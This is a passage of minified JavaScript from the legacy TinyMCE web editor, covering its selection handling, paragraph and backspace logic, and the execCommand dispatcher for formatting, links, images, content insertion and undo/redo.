rng.selectNode(node);if(collapse){if(!to_start&&node.nodeType==3){rng.setStart(node,node.nodeValue.length);rng.setEnd(node,node.nodeValue.length);}else rng.collapse(to_start);}sel.removeAllRanges();sel.addRange(rng);}this.scrollToNode(node);tinyMCE.selectedElement=null;if(node.nodeType==1)tinyMCE.selectedElement=node;};TinyMCEControl.prototype.scrollToNode=function(node){var pos=tinyMCE.getAbsPosition(node);var doc=this.getDoc();var scrollX=doc.body.scrollLeft+doc.documentElement.scrollLeft;var scrollY=doc.body.scrollTop+doc.documentElement.scrollTop;var height=tinyMCE.isMSIE?document.getElementById(this.editorId).style.pixelHeight:this.targetElement.clientHeight;if(!tinyMCE.settings['auto_resize']&&!(pos.absTop>scrollY&&pos.absTop<(scrollY-25+height)))this.contentWindow.scrollTo(pos.absLeft,pos.absTop-height+25);};TinyMCEControl.prototype.getBody=function(){return this.getDoc().body;};TinyMCEControl.prototype.getDoc=function(){return this.contentWindow.document;};TinyMCEControl.prototype.getWin=function(){return this.contentWindow;};TinyMCEControl.prototype.getSel=function(){if(tinyMCE.isMSIE&&!tinyMCE.isOpera)return this.getDoc().selection;var sel=this.contentWindow.getSelection();if(tinyMCE.isSafari&&!sel.getRangeAt){var newSel=new Object();var doc=this.getDoc();function getRangeAt(idx){var rng=new Object();rng.startContainer=this.focusNode;rng.endContainer=this.anchorNode;rng.commonAncestorContainer=this.focusNode;rng.createContextualFragment=function(html){if(html.charAt(0)=='<'){var elm=doc.createElement("div");elm.innerHTML=html;return elm.firstChild;}return doc.createTextNode("UNSUPPORTED, DUE TO LIMITATIONS IN SAFARI!");};rng.deleteContents=function(){doc.execCommand("Delete",false,"");};return rng;}newSel.focusNode=sel.baseNode;newSel.focusOffset=sel.baseOffset;newSel.anchorNode=sel.extentNode;newSel.anchorOffset=sel.extentOffset;newSel.getRangeAt=getRangeAt;newSel.text=""+sel;newSel.realSelection=sel;newSel.toString=function(){return this.text;};return newSel;}return sel;};TinyMCEControl.prototype.getRng=function(){var sel=this.getSel();if(sel==null)return null;if(tinyMCE.isMSIE&&!tinyMCE.isOpera)return sel.createRange();if(tinyMCE.isSafari){var rng=this.getDoc().createRange();var sel=this.getSel().realSelection;rng.setStart(sel.baseNode,sel.baseOffset);rng.setEnd(sel.extentNode,sel.extentOffset);return rng;}return this.getSel().getRangeAt(0);};TinyMCEControl.prototype._insertPara=function(e){function isEmpty(para){function isEmptyHTML(html){return html.replace(new RegExp('[ \t\r\n]+','g'),'').toLowerCase()=="";}if(para.getElementsByTagName("img").length>0)return false;if(para.getElementsByTagName("table").length>0)return false;if(para.getElementsByTagName("hr").length>0)return false;var nodes=tinyMCE.getNodeTree(para,new Array(),3);for(var i=0;i<nodes.length;i++){if(!isEmptyHTML(nodes[i].nodeValue))return false;}return true;}var doc=this.getDoc();var sel=this.getSel();var win=this.contentWindow;var rng=sel.getRangeAt(0);var body=doc.body;var rootElm=doc.documentElement;var self=this;var blockName="P";var rngBefore=doc.createRange();rngBefore.setStart(sel.anchorNode,sel.anchorOffset);rngBefore.collapse(true);var rngAfter=doc.createRange();rngAfter.setStart(sel.focusNode,sel.focusOffset);rngAfter.collapse(true);var direct=rngBefore.compareBoundaryPoints(rngBefore.START_TO_END,rngAfter)<0;var startNode=direct?sel.anchorNode:sel.focusNode;var startOffset=direct?sel.anchorOffset:sel.focusOffset;var endNode=direct?sel.focusNode:sel.anchorNode;var endOffset=direct?sel.focusOffset:sel.anchorOffset;startNode=startNode.nodeName=="BODY"?startNode.firstChild:startNode;endNode=endNode.nodeName=="BODY"?endNode.firstChild:endNode;var startBlock=tinyMCE.getParentBlockElement(startNode);var endBlock=tinyMCE.getParentBlockElement(endNode);if(startBlock!=null){blockName=startBlock.nodeName;if(blockName=="TD"||blockName=="TABLE"||(blockName=="DIV"&&new RegExp('left|right','gi').test(startBlock.style.cssFloat)))blockName="P";}if(tinyMCE.getParentElement(startBlock,"OL,UL")!=null)return false;if((startBlock!=null&&startBlock.nodeName=="TABLE")||(endBlock!=null&&endBlock.nodeName=="TABLE"))startBlock=endBlock=null;var paraBefore=(startBlock!=null&&startBlock.nodeName==blockName)?startBlock.cloneNode(false):doc.createElement(blockName);var paraAfter=(endBlock!=null&&endBlock.nodeName==blockName)?endBlock.cloneNode(false):doc.createElement(blockName);if(/^(H[1-6])$/.test(blockName))paraAfter=doc.createElement("p");var startChop=startNode;var endChop=endNode;node=startChop;do{if(node==body||node.nodeType==9||tinyMCE.isBlockElement(node))break;startChop=node;}while((node=node.previousSibling?node.previousSibling:node.parentNode));node=endChop;do{if(node==body||node.nodeType==9||tinyMCE.isBlockElement(node))break;endChop=node;}while((node=node.nextSibling?node.nextSibling:node.parentNode));if(startChop.nodeName=="TD")startChop=startChop.firstChild;if(endChop.nodeName=="TD")endChop=endChop.lastChild;if(startBlock==null){rng.deleteContents();sel.removeAllRanges();if(startChop!=rootElm&&endChop!=rootElm){rngBefore=rng.cloneRange();if(startChop==body)rngBefore.setStart(startChop,0);else rngBefore.setStartBefore(startChop);paraBefore.appendChild(rngBefore.cloneContents());if(endChop.parentNode.nodeName==blockName)endChop=endChop.parentNode;rng.setEndAfter(endChop);if(endChop.nodeName!="#text"&&endChop.nodeName!="BODY")rngBefore.setEndAfter(endChop);var contents=rng.cloneContents();if(contents.firstChild&&(contents.firstChild.nodeName==blockName||contents.firstChild.nodeName=="BODY"))paraAfter.innerHTML=contents.firstChild.innerHTML;else paraAfter.appendChild(contents);if(isEmpty(paraBefore))paraBefore.innerHTML=" ";if(isEmpty(paraAfter))paraAfter.innerHTML=" ";rng.deleteContents();rngAfter.deleteContents();rngBefore.deleteContents();paraAfter.normalize();rngBefore.insertNode(paraAfter);paraBefore.normalize();rngBefore.insertNode(paraBefore);}else{body.innerHTML="<"+blockName+"> </"+blockName+"><"+blockName+"> </"+blockName+">";paraAfter=body.childNodes[1];}this.selectNode(paraAfter,true,true);return true;}if(startChop.nodeName==blockName)rngBefore.setStart(startChop,0);else rngBefore.setStartBefore(startChop);rngBefore.setEnd(startNode,startOffset);paraBefore.appendChild(rngBefore.cloneContents());rngAfter.setEndAfter(endChop);rngAfter.setStart(endNode,endOffset);var contents=rngAfter.cloneContents();if(contents.firstChild&&contents.firstChild.nodeName==blockName){paraAfter.innerHTML=contents.firstChild.innerHTML;}else paraAfter.appendChild(contents);if(isEmpty(paraBefore))paraBefore.innerHTML=" ";if(isEmpty(paraAfter))paraAfter.innerHTML=" ";var rng=doc.createRange();if(!startChop.previousSibling&&startChop.parentNode.nodeName.toUpperCase()==blockName){rng.setStartBefore(startChop.parentNode);}else{if(rngBefore.startContainer.nodeName.toUpperCase()==blockName&&rngBefore.startOffset==0)rng.setStartBefore(rngBefore.startContainer);else rng.setStart(rngBefore.startContainer,rngBefore.startOffset);}if(!endChop.nextSibling&&endChop.parentNode.nodeName.toUpperCase()==blockName)rng.setEndAfter(endChop.parentNode);else rng.setEnd(rngAfter.endContainer,rngAfter.endOffset);rng.deleteContents();rng.insertNode(paraAfter);rng.insertNode(paraBefore);paraAfter.normalize();paraBefore.normalize();this.selectNode(paraAfter,true,true);return true;};TinyMCEControl.prototype._handleBackSpace=function(evt_type){var doc=this.getDoc();var sel=this.getSel();if(sel==null)return false;var rng=sel.getRangeAt(0);var node=rng.startContainer;var elm=node.nodeType==3?node.parentNode:node;if(node==null)return;if(elm&&elm.nodeName==""){var para=doc.createElement("p");while(elm.firstChild)para.appendChild(elm.firstChild);elm.parentNode.insertBefore(para,elm);elm.parentNode.removeChild(elm);var rng=rng.cloneRange();rng.setStartBefore(node.nextSibling);rng.setEndAfter(node.nextSibling);rng.extractContents();this.selectNode(node.nextSibling,true,true);}var para=tinyMCE.getParentBlockElement(node);if(para!=null&¶.nodeName.toLowerCase()=='p'&&evt_type=="keypress"){var htm=para.innerHTML;var block=tinyMCE.getParentBlockElement(node);if(htm==""||htm==" "||block.nodeName.toLowerCase()=="li"){var prevElm=para.previousSibling;while(prevElm!=null&&prevElm.nodeType!=1)prevElm=prevElm.previousSibling;if(prevElm==null)return false;var nodes=tinyMCE.getNodeTree(prevElm,new Array(),3);var lastTextNode=nodes.length==0?null:nodes[nodes.length-1];if(lastTextNode!=null)this.selectNode(lastTextNode,true,false,false);para.parentNode.removeChild(para);return true;}}return false;};TinyMCEControl.prototype._insertSpace=function(){return true;};TinyMCEControl.prototype.autoResetDesignMode=function(){if(!tinyMCE.isMSIE&&tinyMCE.settings['auto_reset_designmode']){var sel=this.getSel();if(!sel||!sel.rangeCount||sel.rangeCount==0)eval('try { this.getDoc().designMode = "On"; } catch(e) {}');}};TinyMCEControl.prototype.isDirty=function(){return this.startContent!=tinyMCE.trim(this.getBody().innerHTML)&&!tinyMCE.isNotDirty;};TinyMCEControl.prototype._mergeElements=function(scmd,pa,ch,override){if(scmd=="removeformat"){pa.className="";pa.style.cssText="";ch.className="";ch.style.cssText="";return;}var st=tinyMCE.parseStyle(tinyMCE.getAttrib(pa,"style"));var stc=tinyMCE.parseStyle(tinyMCE.getAttrib(ch,"style"));var className=tinyMCE.getAttrib(pa,"class");className+=" "+tinyMCE.getAttrib(ch,"class");if(override){for(var n in st){if(typeof(st[n])=='function')continue;stc[n]=st[n];}}else{for(var n in stc){if(typeof(stc[n])=='function')continue;st[n]=stc[n];}}tinyMCE.setAttrib(pa,"style",tinyMCE.serializeStyle(st));tinyMCE.setAttrib(pa,"class",tinyMCE.trim(className));ch.className="";ch.style.cssText="";ch.removeAttribute("class");ch.removeAttribute("style");};TinyMCEControl.prototype.setUseCSS=function(b){var doc=this.getDoc();try{doc.execCommand("useCSS",false,!b);}catch(ex){}try{doc.execCommand("styleWithCSS",false,b);}catch(ex){}};TinyMCEControl.prototype.execCommand=function(command,user_interface,value){var doc=this.getDoc();var win=this.getWin();var focusElm=this.getFocusElement();if(this.lastSafariSelection&&!new RegExp('mceStartTyping|mceEndTyping|mceBeginUndoLevel|mceEndUndoLevel|mceAddUndoLevel','gi').test(command)){this.moveToBookmark(this.lastSafariSelection);tinyMCE.selectedElement=this.lastSafariSelectedElement;}if(!tinyMCE.isMSIE&&!this.useCSS){this.setUseCSS(false);this.useCSS=true;}this.contentDocument=doc;if(tinyMCE._themeExecCommand(this.editorId,this.getBody(),command,user_interface,value))return;if(focusElm&&focusElm.nodeName=="IMG"){var align=focusElm.getAttribute('align');var img=command=="JustifyCenter"?focusElm.cloneNode(false):focusElm;switch(command){case "JustifyLeft":if(align=='left')img.removeAttribute('align');else img.setAttribute('align','left');var div=focusElm.parentNode;if(div&&div.nodeName=="DIV"&&div.childNodes.length==1&&div.parentNode)div.parentNode.replaceChild(img,div);this.selectNode(img);this.repaint();tinyMCE.triggerNodeChange();return;case "JustifyCenter":img.removeAttribute('align');var div=tinyMCE.getParentElement(focusElm,"div");if(div&&div.style.textAlign=="center"){if(div.nodeName=="DIV"&&div.childNodes.length==1&&div.parentNode)div.parentNode.replaceChild(img,div);}else{var div=this.getDoc().createElement("div");div.style.textAlign='center';div.appendChild(img);focusElm.parentNode.replaceChild(div,focusElm);}this.selectNode(img);this.repaint();tinyMCE.triggerNodeChange();return;case "JustifyRight":if(align=='right')img.removeAttribute('align');else img.setAttribute('align','right');var div=focusElm.parentNode;if(div&&div.nodeName=="DIV"&&div.childNodes.length==1&&div.parentNode)div.parentNode.replaceChild(img,div);this.selectNode(img);this.repaint();tinyMCE.triggerNodeChange();return;}}if(tinyMCE.settings['force_br_newlines']){var alignValue="";if(doc.selection.type!="Control"){switch(command){case "JustifyLeft":alignValue="left";break;case "JustifyCenter":alignValue="center";break;case "JustifyFull":alignValue="justify";break;case "JustifyRight":alignValue="right";break;}if(alignValue!=""){var rng=doc.selection.createRange();if((divElm=tinyMCE.getParentElement(rng.parentElement(),"div"))!=null)divElm.setAttribute("align",alignValue);else if(rng.pasteHTML&&rng.htmlText.length>0)rng.pasteHTML('<div align="'+alignValue+'">'+rng.htmlText+"</div>");tinyMCE.triggerNodeChange();return;}}}switch(command){case "mceRepaint":this.repaint();return true;case "mceStoreSelection":this.selectionBookmark=this.getBookmark();return true;case "mceRestoreSelection":this.moveToBookmark(this.selectionBookmark);return true;case "InsertUnorderedList":case "InsertOrderedList":var tag=(command=="InsertUnorderedList")?"ul":"ol";if(tinyMCE.isSafari)this.execCommand("mceInsertContent",false,"<"+tag+"><li> </li><"+tag+">");else this.getDoc().execCommand(command,user_interface,value);tinyMCE.triggerNodeChange();break;case "Strikethrough":if(tinyMCE.isSafari)this.execCommand("mceInsertContent",false,"<strike>"+this.getSelectedHTML()+"</strike>");else this.getDoc().execCommand(command,user_interface,value);tinyMCE.triggerNodeChange();break;case "mceSelectNode":this.selectNode(value);tinyMCE.triggerNodeChange();tinyMCE.selectedNode=value;break;case "FormatBlock":if(value==null||value==""){var elm=tinyMCE.getParentElement(this.getFocusElement(),"p,div,h1,h2,h3,h4,h5,h6,pre,address");if(elm)this.execCommand("mceRemoveNode",false,elm);}else this.getDoc().execCommand("FormatBlock",false,value);tinyMCE.triggerNodeChange();break;case "mceRemoveNode":if(!value)value=tinyMCE.getParentElement(this.getFocusElement());if(tinyMCE.isMSIE){value.outerHTML=value.innerHTML;}else{var rng=value.ownerDocument.createRange();rng.setStartBefore(value);rng.setEndAfter(value);rng.deleteContents();rng.insertNode(rng.createContextualFragment(value.innerHTML));}tinyMCE.triggerNodeChange();break;case "mceSelectNodeDepth":var parentNode=this.getFocusElement();for(var i=0;parentNode;i++){if(parentNode.nodeName.toLowerCase()=="body")break;if(parentNode.nodeName.toLowerCase()=="#text"){i--;parentNode=parentNode.parentNode;continue;}if(i==value){this.selectNode(parentNode,false);tinyMCE.triggerNodeChange();tinyMCE.selectedNode=parentNode;return;}parentNode=parentNode.parentNode;}break;case "SetStyleInfo":var rng=this.getRng();var sel=this.getSel();var scmd=value['command'];var sname=value['name'];var svalue=value['value']==null?'':value['value'];var wrapper=value['wrapper']?value['wrapper']:"span";var parentElm=null;var invalidRe=new RegExp("^BODY|HTML$","g");var invalidParentsRe=tinyMCE.settings['merge_styles_invalid_parents']!=''?new RegExp(tinyMCE.settings['merge_styles_invalid_parents'],"gi"):null;if(tinyMCE.isMSIE){if(rng.item)parentElm=rng.item(0);else{var pelm=rng.parentElement();var prng=doc.selection.createRange();prng.moveToElementText(pelm);if(rng.htmlText==prng.htmlText||rng.boundingWidth==0){if(invalidParentsRe==null||!invalidParentsRe.test(pelm.nodeName))parentElm=pelm;}}}else{var felm=this.getFocusElement();if(sel.isCollapsed||(/td|tr|tbody|table/ig.test(felm.nodeName)&&sel.anchorNode==felm.parentNode))parentElm=felm;}if(parentElm&&!invalidRe.test(parentElm.nodeName)){if(scmd=="setstyle")tinyMCE.setStyleAttrib(parentElm,sname,svalue);if(scmd=="setattrib")tinyMCE.setAttrib(parentElm,sname,svalue);if(scmd=="removeformat"){parentElm.style.cssText='';tinyMCE.setAttrib(parentElm,'class','');}var ch=tinyMCE.getNodeTree(parentElm,new Array(),1);for(var z=0;z<ch.length;z++){if(ch[z]==parentElm)continue;if(scmd=="setstyle")tinyMCE.setStyleAttrib(ch[z],sname,'');if(scmd=="setattrib")tinyMCE.setAttrib(ch[z],sname,'');if(scmd=="removeformat"){ch[z].style.cssText='';tinyMCE.setAttrib(ch[z],'class','');}}}else{doc.execCommand("fontname",false,"#mce_temp_font#");var elementArray=tinyMCE.getElementsByAttributeValue(this.getBody(),"font","face","#mce_temp_font#");for(var x=0;x<elementArray.length;x++){elm=elementArray[x];if(elm){var spanElm=doc.createElement(wrapper);if(scmd=="setstyle")tinyMCE.setStyleAttrib(spanElm,sname,svalue);if(scmd=="setattrib")tinyMCE.setAttrib(spanElm,sname,svalue);if(scmd=="removeformat"){spanElm.style.cssText='';tinyMCE.setAttrib(spanElm,'class','');}if(elm.hasChildNodes()){for(var i=0;i<elm.childNodes.length;i++)spanElm.appendChild(elm.childNodes[i].cloneNode(true));}spanElm.setAttribute("mce_new","true");elm.parentNode.replaceChild(spanElm,elm);var ch=tinyMCE.getNodeTree(spanElm,new Array(),1);for(var z=0;z<ch.length;z++){if(ch[z]==spanElm)continue;if(scmd=="setstyle")tinyMCE.setStyleAttrib(ch[z],sname,'');if(scmd=="setattrib")tinyMCE.setAttrib(ch[z],sname,'');if(scmd=="removeformat"){ch[z].style.cssText='';tinyMCE.setAttrib(ch[z],'class','');}}}}}var nodes=doc.getElementsByTagName(wrapper);for(var i=nodes.length-1;i>=0;i--){var elm=nodes[i];var isNew=tinyMCE.getAttrib(elm,"mce_new")=="true";elm.removeAttribute("mce_new");if(elm.childNodes&&elm.childNodes.length==1&&elm.childNodes[0].nodeType==1){this._mergeElements(scmd,elm,elm.childNodes[0],isNew);continue;}if(elm.parentNode.childNodes.length==1&&!invalidRe.test(elm.nodeName)&&!invalidRe.test(elm.parentNode.nodeName)){if(invalidParentsRe==null||!invalidParentsRe.test(elm.parentNode.nodeName))this._mergeElements(scmd,elm.parentNode,elm,false);}}var nodes=doc.getElementsByTagName(wrapper);for(var i=nodes.length-1;i>=0;i--){var elm=nodes[i];var isEmpty=true;var tmp=doc.createElement("body");tmp.appendChild(elm.cloneNode(false));tmp.innerHTML=tmp.innerHTML.replace(new RegExp('style=""|class=""','gi'),'');if(new RegExp('<span>','gi').test(tmp.innerHTML)){for(var x=0;x<elm.childNodes.length;x++){if(elm.parentNode!=null)elm.parentNode.insertBefore(elm.childNodes[x].cloneNode(true),elm);}elm.parentNode.removeChild(elm);}}if(scmd=="removeformat")tinyMCE.handleVisualAid(this.getBody(),true,this.visualAid,this);tinyMCE.triggerNodeChange();break;case "FontName":this.getDoc().execCommand('FontName',false,value);if(tinyMCE.isGecko)window.setTimeout('tinyMCE.triggerNodeChange(false);',1);return;case "FontSize":this.getDoc().execCommand('FontSize',false,value);if(tinyMCE.isGecko)window.setTimeout('tinyMCE.triggerNodeChange(false);',1);return;case "forecolor":this.getDoc().execCommand('forecolor',false,value);break;case "HiliteColor":if(tinyMCE.isGecko){this.setUseCSS(true);this.getDoc().execCommand('hilitecolor',false,value);this.setUseCSS(false);}else this.getDoc().execCommand('BackColor',false,value);break;case "Cut":case "Copy":case "Paste":var cmdFailed=false;eval('try {this.getDoc().execCommand(command, user_interface, value);} catch (e) {cmdFailed = true;}');if(tinyMCE.isOpera&&cmdFailed)alert('Currently not supported by your browser, use keyboard shortcuts instead.');if(tinyMCE.isGecko&&cmdFailed){if(confirm(tinyMCE.getLang('lang_clipboard_msg')))window.open('http://www.mozilla.org/editor/midasdemo/securityprefs.html','mceExternal');return;}else tinyMCE.triggerNodeChange();break;case "mceSetContent":if(!value)value="";value=tinyMCE._customCleanup(this,"insert_to_editor",value);tinyMCE._setHTML(doc,value);tinyMCE.setInnerHTML(doc.body,tinyMCE._cleanupHTML(this,doc,tinyMCE.settings,doc.body));tinyMCE.handleVisualAid(doc.body,true,this.visualAid,this);tinyMCE._setEventsEnabled(doc.body,false);return true;case "mceLink":var selectedText="";if(tinyMCE.isMSIE){var rng=doc.selection.createRange();selectedText=rng.text;}else selectedText=this.getSel().toString();if(!tinyMCE.linkElement){if((tinyMCE.selectedElement.nodeName.toLowerCase()!="img")&&(selectedText.length<=0))return;}var href="",target="",title="",onclick="",action="insert",style_class="";if(tinyMCE.selectedElement.nodeName.toLowerCase()=="a")tinyMCE.linkElement=tinyMCE.selectedElement;if(tinyMCE.linkElement!=null&&tinyMCE.getAttrib(tinyMCE.linkElement,'href')=="")tinyMCE.linkElement=null;if(tinyMCE.linkElement){href=tinyMCE.getAttrib(tinyMCE.linkElement,'href');target=tinyMCE.getAttrib(tinyMCE.linkElement,'target');title=tinyMCE.getAttrib(tinyMCE.linkElement,'title');onclick=tinyMCE.getAttrib(tinyMCE.linkElement,'onclick');style_class=tinyMCE.getAttrib(tinyMCE.linkElement,'class');if(onclick=="")onclick=tinyMCE.getAttrib(tinyMCE.linkElement,'onclick');onclick=tinyMCE.cleanupEventStr(onclick);mceRealHref=tinyMCE.getAttrib(tinyMCE.linkElement,'mce_real_href');if(mceRealHref!="")href=mceRealHref;href=eval(tinyMCE.settings['urlconverter_callback']+"(href, tinyMCE.linkElement, true);");action="update";}if(this.settings['insertlink_callback']){var returnVal=eval(this.settings['insertlink_callback']+"(href, target, title, onclick, action, style_class);");if(returnVal&&returnVal['href'])tinyMCE.insertLink(returnVal['href'],returnVal['target'],returnVal['title'],returnVal['onclick'],returnVal['style_class']);}else{tinyMCE.openWindow(this.insertLinkTemplate,{href:href,target:target,title:title,onclick:onclick,action:action,className:style_class});}break;case "mceImage":var src="",alt="",border="",hspace="",vspace="",width="",height="",align="";var title="",onmouseover="",onmouseout="",action="insert";var img=tinyMCE.imgElement;if(tinyMCE.selectedElement!=null&&tinyMCE.selectedElement.nodeName.toLowerCase()=="img"){img=tinyMCE.selectedElement;tinyMCE.imgElement=img;}if(img){if(tinyMCE.getAttrib(img,'name').indexOf('mce_')==0)return;src=tinyMCE.getAttrib(img,'src');alt=tinyMCE.getAttrib(img,'alt');if(alt=="")alt=tinyMCE.getAttrib(img,'title');if(tinyMCE.isGecko){var w=img.style.width;if(w!=null&&w!="")img.setAttribute("width",w);var h=img.style.height;if(h!=null&&h!="")img.setAttribute("height",h);}border=tinyMCE.getAttrib(img,'border');hspace=tinyMCE.getAttrib(img,'hspace');vspace=tinyMCE.getAttrib(img,'vspace');width=tinyMCE.getAttrib(img,'width');height=tinyMCE.getAttrib(img,'height');align=tinyMCE.getAttrib(img,'align');onmouseover=tinyMCE.getAttrib(img,'onmouseover');onmouseout=tinyMCE.getAttrib(img,'onmouseout');title=tinyMCE.getAttrib(img,'title');if(tinyMCE.isMSIE){width=img.attributes['width'].specified?width:"";height=img.attributes['height'].specified?height:"";}onmouseover=tinyMCE.getImageSrc(tinyMCE.cleanupEventStr(onmouseover));onmouseout=tinyMCE.getImageSrc(tinyMCE.cleanupEventStr(onmouseout));mceRealSrc=tinyMCE.getAttrib(img,'mce_real_src');if(mceRealSrc!="")src=mceRealSrc;src=eval(tinyMCE.settings['urlconverter_callback']+"(src, img, true);");if(onmouseover!="")onmouseover=eval(tinyMCE.settings['urlconverter_callback']+"(onmouseover, img, true);");if(onmouseout!="")onmouseout=eval(tinyMCE.settings['urlconverter_callback']+"(onmouseout, img, true);");action="update";}if(this.settings['insertimage_callback']){var returnVal=eval(this.settings['insertimage_callback']+"(src, alt, border, hspace, vspace, width, height, align, title, onmouseover, onmouseout, action);");if(returnVal&&returnVal['src'])tinyMCE.insertImage(returnVal['src'],returnVal['alt'],returnVal['border'],returnVal['hspace'],returnVal['vspace'],returnVal['width'],returnVal['height'],returnVal['align'],returnVal['title'],returnVal['onmouseover'],returnVal['onmouseout']);}else tinyMCE.openWindow(this.insertImageTemplate,{src:src,alt:alt,border:border,hspace:hspace,vspace:vspace,width:width,height:height,align:align,title:title,onmouseover:onmouseover,onmouseout:onmouseout,action:action});break;case "mceCleanup":tinyMCE._setHTML(this.contentDocument,this.getBody().innerHTML);tinyMCE.setInnerHTML(this.getBody(),tinyMCE._cleanupHTML(this,this.contentDocument,this.settings,this.getBody(),this.visualAid));tinyMCE.handleVisualAid(this.getBody(),true,this.visualAid,this);tinyMCE._setEventsEnabled(this.getBody(),false);this.repaint();tinyMCE.triggerNodeChange();break;case "mceReplaceContent":this.getWin().focus();var selectedText="";if(tinyMCE.isMSIE){var rng=doc.selection.createRange();selectedText=rng.text;}else selectedText=this.getSel().toString();if(selectedText.length>0){value=tinyMCE.replaceVar(value,"selection",selectedText);tinyMCE.execCommand('mceInsertContent',false,value);}tinyMCE.triggerNodeChange();break;case "mceSetAttribute":if(typeof(value)=='object'){var targetElms=(typeof(value['targets'])=="undefined")?"p,img,span,div,td,h1,h2,h3,h4,h5,h6,pre,address":value['targets'];var targetNode=tinyMCE.getParentElement(this.getFocusElement(),targetElms);if(targetNode){targetNode.setAttribute(value['name'],value['value']);tinyMCE.triggerNodeChange();}}break;case "mceSetCSSClass":this.execCommand("SetStyleInfo",false,{command:"setattrib",name:"class",value:value});break;case "mceInsertRawHTML":var key='tiny_mce_marker';this.execCommand('mceBeginUndoLevel');this.execCommand('mceInsertContent',false,key);var scrollX=this.getDoc().body.scrollLeft+this.getDoc().documentElement.scrollLeft;var scrollY=this.getDoc().body.scrollTop+this.getDoc().documentElement.scrollTop;var html=this.getBody().innerHTML;if((pos=html.indexOf(key))!=-1)tinyMCE.setInnerHTML(this.getBody(),html.substring(0,pos)+value+html.substring(pos+key.length));this.contentWindow.scrollTo(scrollX,scrollY);this.execCommand('mceEndUndoLevel');break;case "mceInsertContent":var insertHTMLFailed=false;this.getWin().focus();if(tinyMCE.isGecko||tinyMCE.isOpera){try{this.getDoc().execCommand('inserthtml',false,value);}catch(ex){insertHTMLFailed=true;}if(!insertHTMLFailed){tinyMCE.triggerNodeChange();return;}}if(tinyMCE.isOpera&&insertHTMLFailed){this.getDoc().execCommand("insertimage",false,tinyMCE.uniqueURL);var ar=tinyMCE.getElementsByAttributeValue(this.getBody(),"img","src",tinyMCE.uniqueURL);ar[0].outerHTML=value;return;}if(!tinyMCE.isMSIE){var isHTML=value.indexOf('<')!=-1;var sel=this.getSel();var rng=this.getRng();if(isHTML){if(tinyMCE.isSafari){var tmpRng=this.getDoc().createRange();tmpRng.setStart(this.getBody(),0);tmpRng.setEnd(this.getBody(),0);value=tmpRng.createContextualFragment(value);}else value=rng.createContextualFragment(value);}else{var el=document.createElement("div");el.innerHTML=value;value=el.firstChild.nodeValue;value=doc.createTextNode(value);}if(tinyMCE.isSafari&&!isHTML){this.execCommand('InsertText',false,value.nodeValue);tinyMCE.triggerNodeChange();return true;}else if(tinyMCE.isSafari&&isHTML){rng.deleteContents();rng.insertNode(value);tinyMCE.triggerNodeChange();return true;}rng.deleteContents();if(rng.startContainer.nodeType==3){var node=rng.startContainer.splitText(rng.startOffset);node.parentNode.insertBefore(value,node);}else rng.insertNode(value);if(!isHTML){sel.selectAllChildren(doc.body);sel.removeAllRanges();var rng=doc.createRange();rng.selectNode(value);rng.collapse(false);sel.addRange(rng);}else rng.collapse(false);}else{var rng=doc.selection.createRange();if(rng.item)rng.item(0).outerHTML=value;else rng.pasteHTML(value);}tinyMCE.triggerNodeChange();break;case "mceStartTyping":if(tinyMCE.settings['custom_undo_redo']&&this.typingUndoIndex==-1){this.typingUndoIndex=this.undoIndex;this.execCommand('mceAddUndoLevel');}break;case "mceEndTyping":if(tinyMCE.settings['custom_undo_redo']&&this.typingUndoIndex!=-1){this.execCommand('mceAddUndoLevel');this.typingUndoIndex=-1;}break;case "mceBeginUndoLevel":this.undoRedo=false;break;case "mceEndUndoLevel":this.undoRedo=true;this.execCommand('mceAddUndoLevel');break;case "mceAddUndoLevel":if(tinyMCE.settings['custom_undo_redo']&&this.undoRedo){if(this.typingUndoIndex!=-1){this.undoIndex=this.typingUndoIndex;}var newHTML=tinyMCE.trim(this.getBody().innerHTML);if(newHTML!=this.undoLevels[this.undoIndex]){tinyMCE.executeCallback('onchange_callback','_onchange',0,this);var customUndoLevels=tinyMCE.settings['custom_undo_redo_levels'];if(customUndoLevels!=-1&&this.undoLevels.length>customUndoLevels){for(var i=0;i<this.undoLevels.length-1;i++){this.undoLevels[i]=this.undoLevels[i+1];}this.undoLevels.length--;this.undoIndex--;}this.undoIndex++;this.undoLevels[this.undoIndex]=newHTML;this.undoLevels.length=this.undoIndex+1;tinyMCE.triggerNodeChange(false);}}break;case "Undo":if(tinyMCE.settings['custom_undo_redo']){tinyMCE.execCommand("mceEndTyping");if(this.undoIndex>0){this.undoIndex--;tinyMCE.setInnerHTML(this.getBody(),this.undoLevels[this.undoIndex]);this.repaint();}tinyMCE.triggerNodeChange();}else this.getDoc().execCommand(command,user_interface,value);break;case "Redo":if(tinyMCE.settings['custom_undo_redo']){tinyMCE.execCommand("mceEndTyping");if(this.undoIndex<(this.undoLevels.length-1)){this.undoIndex++;tinyMCE.setInnerHTML(this.getBody(),this.undoLevels[this.undoIndex]);this.repaint();}tinyMCE.triggerNodeChange();}else this.getDoc().execCommand(command,user_interface,value);break;case "mceToggleVisualAid":this.visualAid=!this.visualAid;tinyMCE.handleVisualAid(this.getBody(),true,this.visualAid,this);tinyMCE.triggerNodeChange();break;case "Indent":this.getDoc().execCommand(command,user_interface,value);tinyMCE.triggerNodeChange();if(tinyMCE.isMSIE){var n=tinyMCE.getParentElement(this.getFocusElement(),"blockquote");do{if(n&&n.nodeName=="BLOCKQUOTE"){n.removeAttribute("dir");n.removeAttribute("style");}}while(n!=null&&(n=n.parentNode)!=null);}break;case "removeformat":var text=this.getSelectedText();if(tinyMCE.isOpera){this.getDoc().execCommand("RemoveFormat",false,null);return;}if(tinyMCE.isMSIE){try{var rng=doc.selection.createRange();rng.execCommand("RemoveFormat",false,null);}catch(e){}this.execCommand("SetStyleInfo",false,{command:"removeformat"});}else{this.getDoc().execCommand(command,user_interface,value);this.execCommand("SetStyleInfo",false,{command:"removeformat"});}if(text.length==0)this.execCommand("mceSetCSSClass",false,"");tinyMCE.triggerNodeChange();break;default:this.getDoc().execCommand(command,user_interface,value);if(tinyMCE.isGecko)window.setTimeout('tinyMCE.triggerNodeChange(false);',1);else tinyMCE.triggerNodeChange();}if(command!="mceAddUndoLevel"&&command!="Undo"&&command!="Redo"&&command!="mceStartTyping"&&command!="mceEndTyping")tinyMCE.execCommand("mceAddUndoLevel");};TinyMCEControl.prototype.queryCommandValue=function(command){return this.getDoc().queryCommandValue(command);};TinyMCEControl.prototype.queryCommandState=function(command){return this.getDoc().queryCommandState(command);};TinyMCEControl.prototype.onAdd=function(replace_element,form_element_name,target_document){var 